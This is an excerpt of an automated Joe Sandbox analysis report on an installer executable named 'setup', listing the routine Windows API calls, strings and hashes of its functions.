                                                                                                                                                                              • Opcode ID: 59f1748d3ea927acc43d8b9f2e6743f9fd1b17920e6a71bdad35a90e7a819b15
                                                                                                                                                                              • Instruction ID: 1a7af25671e13df7dde652e88cfb4a9daffd6c9239ecadae533afc853e813ff4
                                                                                                                                                                              • Opcode Fuzzy Hash: 59f1748d3ea927acc43d8b9f2e6743f9fd1b17920e6a71bdad35a90e7a819b15
                                                                                                                                                                              • Instruction Fuzzy Hash: 59919E71901209DFDB10DFA8C949BAEBBB4EF04314F244159E919BB2D2DB355E44CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                                • Part of subcall function 00CAA030: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00BC8188,00000000,80004005), ref: 00CAA098
                                                                                                                                                                                • Part of subcall function 00CAA030: RedrawWindow.USER32(?,00000000,00000000,00000541,?,?,?,000000EF,?,00BC8188,00000000,80004005), ref: 00CAA0A9
                                                                                                                                                                                • Part of subcall function 00CAA030: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CAA0C8
                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000004,00000004), ref: 00BCF37D
                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000400,00000400), ref: 00BCF394
                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00BCF3F0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$AllocateHeapRedraw
                                                                                                                                                                              • String ID: QuickSelectionList
                                                                                                                                                                              • API String ID: 884508843-3633591268
                                                                                                                                                                              • Opcode ID: 0e869bd2ad6e7d9f0d5fc533156a591fef7ac481156a5bda445b99c6e4ee18fc
                                                                                                                                                                              • Instruction ID: c84f99548b8a99bac224524886814d7cb5a1a56234c0f42d71d5f5f88e21ff9d
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e869bd2ad6e7d9f0d5fc533156a591fef7ac481156a5bda445b99c6e4ee18fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 6E71BC71A00205AFDB14DF68C885BAEF7F5FF89324F10466DF565A7290DB74A904CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,02141699), ref: 00D01272
                                                                                                                                                                              • CloseHandle.KERNEL32(00000008,02141699,?,?,00000000,00DF6653,000000FF,?,80004005), ref: 00D013F0
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,02141699,?,?,00000000,00DF6653,000000FF,?,80004005), ref: 00D0141F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandle$FileModuleName
                                                                                                                                                                              • String ID: LOG
                                                                                                                                                                              • API String ID: 3884789274-429402703
                                                                                                                                                                              • Opcode ID: 894af25042bf12d667d08c04af1f9c1b756eb626197a3c17da7c51e7362befcf
                                                                                                                                                                              • Instruction ID: 22ed970161fcc607f868ba9e918d79aed9afaad9262c50259d61885e0842f10c
                                                                                                                                                                              • Opcode Fuzzy Hash: 894af25042bf12d667d08c04af1f9c1b756eb626197a3c17da7c51e7362befcf
                                                                                                                                                                              • Instruction Fuzzy Hash: 1651D275A04344DFDB24DF68C8057AA77F5FF44700F14866AE81ADB6C0E774AA04C7A4
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00000000,00DE871D,000000FF,?,80004005,02141699,?), ref: 00CCBB83
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,02141699,?,74DF3340,?,00000000,00DE871D,000000FF,?,00CCB927,?,?,74DF3220), ref: 00CCBBB2
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,74DF3220), ref: 00CCBBC2
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DeleteFileInit_thread_footer$ErrorFindHeapLastProcessResource
                                                                                                                                                                              • String ID: \\?\
                                                                                                                                                                              • API String ID: 1908169709-4282027825
                                                                                                                                                                              • Opcode ID: 332d12176a304d5471b02601d975d809d44f32602c540018c6fabac3c243697f
                                                                                                                                                                              • Instruction ID: 43228b54f768265e1cf8e94204acfe607b2464ee6ef6c272c98e488124a62d41
                                                                                                                                                                              • Opcode Fuzzy Hash: 332d12176a304d5471b02601d975d809d44f32602c540018c6fabac3c243697f
                                                                                                                                                                              • Instruction Fuzzy Hash: CD21A171904618DFDB10DFA9C85AFAAB7E8FF05321F20469DE861D72A4DB369D04CB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00BB0F32
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BB0F38
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: RoOriginateLanguageException$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-3996158991
                                                                                                                                                                              • Opcode ID: bb0046b01194f45989ad11c66adb1cb23633d454a228b8b44353d6b6dc9d5ae8
                                                                                                                                                                              • Instruction ID: 4e8fd1e35b9bd316a1986826290dd36403ea9051864cc1cb0d95b6b3b8491259
                                                                                                                                                                              • Opcode Fuzzy Hash: bb0046b01194f45989ad11c66adb1cb23633d454a228b8b44353d6b6dc9d5ae8
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B315071914209DFDB20EFA8C855BFEB7F4EB15310F104A69E825B32D1DBB49A44CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00D020EA,?,02141699,?,?,?,?,00DF6965,000000FF), ref: 00D0412D
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00D020EA,?,02141699,?,?,?,?,00DF6965,000000FF,?), ref: 00D0414E
                                                                                                                                                                              • GetLastError.KERNEL32(?,02141699,?,?,?,?,00DF6965,000000FF,?,00D019ED,?,?,00000000,?,?), ref: 00D041AE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateEvent$ErrorLast
                                                                                                                                                                              • String ID: AdvancedInstaller
                                                                                                                                                                              • API String ID: 1131763895-1372594473
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00CAA450: __Init_thread_footer.LIBCMT ref: 00CAA4E0
                                                                                                                                                                                • Part of subcall function 00CAA450: GetProcAddress.KERNEL32(SetWindowTheme), ref: 00CAA51D
                                                                                                                                                                                • Part of subcall function 00CAA450: __Init_thread_footer.LIBCMT ref: 00CAA534
                                                                                                                                                                                • Part of subcall function 00CAA450: SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 00CAA55F
                                                                                                                                                                              • CreateWindowExW.USER32(80000000,SysListView32,?,00000000,00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CA9F92
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00CA9FB0
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00CA9FB8
                                                                                                                                                                                • Part of subcall function 00BB83A0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00BB83D6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Init_thread_footerWindow$AddressCreateLongProc
                                                                                                                                                                              • String ID: SysListView32
                                                                                                                                                                              • API String ID: 605634508-78025650
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C), ref: 00BB9E0C
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BB9E20
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9E5F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 2351996187-3261393531
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00D84AAD,?,?,00000000,?,?,?,00D84BD7,00000002,FlsGetValue,00E0DF18,FlsGetValue), ref: 00D84B09
                                                                                                                                                                              • GetLastError.KERNEL32(?,00D84AAD,?,?,00000000,?,?,?,00D84BD7,00000002,FlsGetValue,00E0DF18,FlsGetValue,?,?,00D819F4), ref: 00D84B13
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00D84B3B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00BC8138
                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00BC814D
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                                • Part of subcall function 00CAA030: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00BC8188,00000000,80004005), ref: 00CAA098
                                                                                                                                                                                • Part of subcall function 00CAA030: RedrawWindow.USER32(?,00000000,00000000,00000541,?,?,?,000000EF,?,00BC8188,00000000,80004005), ref: 00CAA0A9
                                                                                                                                                                                • Part of subcall function 00CAA030: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CAA0C8
                                                                                                                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00BC8283
                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000005), ref: 00BC837F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$AllocateHeapRedraw
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 884508843-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00BB654A
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6596
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB65B8
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6713
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Free$Alloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 986138563-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000001,0000110A,00000004,?), ref: 00BD18D5
                                                                                                                                                                              • SendMessageW.USER32(00000001,0000110A,00000001,00000000), ref: 00BD1907
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000004,?), ref: 00BD1A7E
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00BD1AA6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,00000000), ref: 00BC0D09
                                                                                                                                                                              • GetParent.USER32(?), ref: 00BC0D29
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000135,?,?), ref: 00BC0D39
                                                                                                                                                                              • FillRect.USER32(?,00000000,00000000), ref: 00BC0D47
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$ClientFillMessageParentSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 425900729-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,000000C5,?,00000000), ref: 00BD4F5B
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BD4F8D
                                                                                                                                                                              • GetDC.USER32(?), ref: 00BD4FA0
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00BD4FA7
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsClientDeviceMessageRectSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3507044913-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BC17B9
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BC17ED
                                                                                                                                                                              • SendMessageW.USER32(?,00000317,00000000,00000006), ref: 00BC1819
                                                                                                                                                                              • SendMessageW.USER32(?,00000318,?,00000006), ref: 00BC1877
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$ClientErrorLastRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2591167063-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindResourceW.KERNEL32(00000000,?,00000017,02141699,?,00EA14E0,?,?,?,?,00000000,Function_002373AD,000000FF,?,?,00EA14E0), ref: 00C59EE9
                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00EA14E0,?,?,?,?,00000000,Function_002373AD,000000FF,?,?,00EA14E0,?), ref: 00C59EF8
                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,00EA14E0,?,?,?,?,00000000,Function_002373AD,000000FF,?,?,00EA14E0,?), ref: 00C59F03
                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,00EA14E0,?,?,?,?,00000000,Function_002373AD,000000FF,?,?,00EA14E0,?), ref: 00C59F14
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3473537107-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00D17C4A
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D17C5D
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00D17CB7
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D17CCA
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDevice
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 328075279-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Focus$ChildWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 501040988-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,02141699), ref: 00BC44EA
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,02141699), ref: 00BC44F7
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC4548
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,02141699), ref: 00BC45DA
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,02141699), ref: 00BC45E7
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC462E
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              APIs
                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,00D05062,?,?,?,?,?,00000003,00000000,02141699,00000000), ref: 00D05CB2
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00D05062,?,?,?,?,?,00000003,00000000,02141699,00000000), ref: 00D05CDF
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,00D05062,?,?,?,?,?,00000003,00000000,02141699,00000000), ref: 00D05D15
                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00D05062,?,?,?,?,?,00000003,00000000,02141699,00000000), ref: 00D05D38
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Event$ErrorLastObjectResetSingleWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 708712559-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,02141699,?), ref: 00BC441D
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,02141699,?), ref: 00BC442A
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC4452
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DeleteObject$Select
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 207189511-0
                                                                                                                                                                              • Opcode ID: 76f57a5d78cc978dc1d0947c679f4107a99300a7cf5ae383ace9b55e82bdbf19
                                                                                                                                                                              • Instruction ID: 2dac44ad922ac5843cd46db3501a72dc904a379efcd499e1715c4fd0aeb6a54d
                                                                                                                                                                              • Opcode Fuzzy Hash: 76f57a5d78cc978dc1d0947c679f4107a99300a7cf5ae383ace9b55e82bdbf19
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A110A71600606AFD7108F5ADD44F6ABBFDFB49720F10466AE814E3690D771A924CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00BC1E9B
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00BC1EB4
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00BC1EC0
                                                                                                                                                                              • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00BC1ED9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CompatibleCreate$BitmapObjectSelectViewport
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1881423421-0
                                                                                                                                                                              • Opcode ID: 642e0c851d61c28f64b82cc3482b1f4ae54ce935ddc3985460bb0cdf620c173b
                                                                                                                                                                              • Instruction ID: c18214432b6a559042967cc452bf92ba3a7bbdf192d88f4ab1f2fc9b1b88e4a2
                                                                                                                                                                              • Opcode Fuzzy Hash: 642e0c851d61c28f64b82cc3482b1f4ae54ce935ddc3985460bb0cdf620c173b
                                                                                                                                                                              • Instruction Fuzzy Hash: 0321F975504B04EFD720CF59C944B6ABBF8FB08710F108A2EE8A6D7AA0D771A944CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BBA93B
                                                                                                                                                                              • BitBlt.GDI32(00000000,?,?,?,00000000,?,00000000,00000000,00CC0020), ref: 00BBA966
                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00BBA96D
                                                                                                                                                                              • ReleaseDC.USER32(?,?), ref: 00BBA97A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClientDeleteRectRelease
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2015589292-0
                                                                                                                                                                              • Opcode ID: 2688abedb34744e282ad236e3d0ad1120c6d6a45e0cfa250a89359b18879b0a0
                                                                                                                                                                              • Instruction ID: 9e1ef439e80aeddfa2d3183f23fafef2647829f5d52de09a6c9aeaa69e4f6bbd
                                                                                                                                                                              • Opcode Fuzzy Hash: 2688abedb34744e282ad236e3d0ad1120c6d6a45e0cfa250a89359b18879b0a0
                                                                                                                                                                              • Instruction Fuzzy Hash: AC011772204201AFD304DB69CC89F2BBBE9FB8C314F45852AF549D2661D770E818CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00D7DB50
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00D7DB5B
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7DBC9
                                                                                                                                                                                • Part of subcall function 00D7DCAB: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D7DCC3
                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00D7DB76
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 677527491-0
                                                                                                                                                                              • Opcode ID: d7b80bd11d3c56be06c14d73a40700048800cc8670e53615a98b93b216a06df7
                                                                                                                                                                              • Instruction ID: 5bd197c05396813ac1fd7007559bac95732d8962b36610ea17c3fa0a46ab5d6e
                                                                                                                                                                              • Opcode Fuzzy Hash: d7b80bd11d3c56be06c14d73a40700048800cc8670e53615a98b93b216a06df7
                                                                                                                                                                              • Instruction Fuzzy Hash: 71019A366002249FC706FB60D88597CBB72EF84340B28801AE805B7391DF746E86CBE5
